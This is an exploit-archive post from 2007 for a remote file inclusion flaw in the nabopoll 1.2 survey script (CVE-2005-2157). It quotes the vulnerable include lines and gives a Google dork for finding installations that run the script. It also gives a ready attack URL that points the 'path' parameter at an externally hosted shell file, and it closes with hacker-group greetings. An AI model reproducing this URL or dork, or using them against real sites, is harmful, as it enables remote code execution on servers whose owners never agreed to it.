nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion



EKU-ID: 11294 CVE: OSVDB-17706;CVE-2005-2157 OSVDB-ID:
Author: Cr@zy_King Published: 2007-02-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


By Cr@zy_King

crazy_king@eno7.org

Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim

Script : nabopoll 1.x

Risk : Remote File .nclude | High

Site : http://nabocorp.com/

Google Dork : inurl:"nabopoll/"

Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");

Files: survey.inc.php

Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?

Ayyildiz.Org Present

# milw0rm.com [2007-02-15]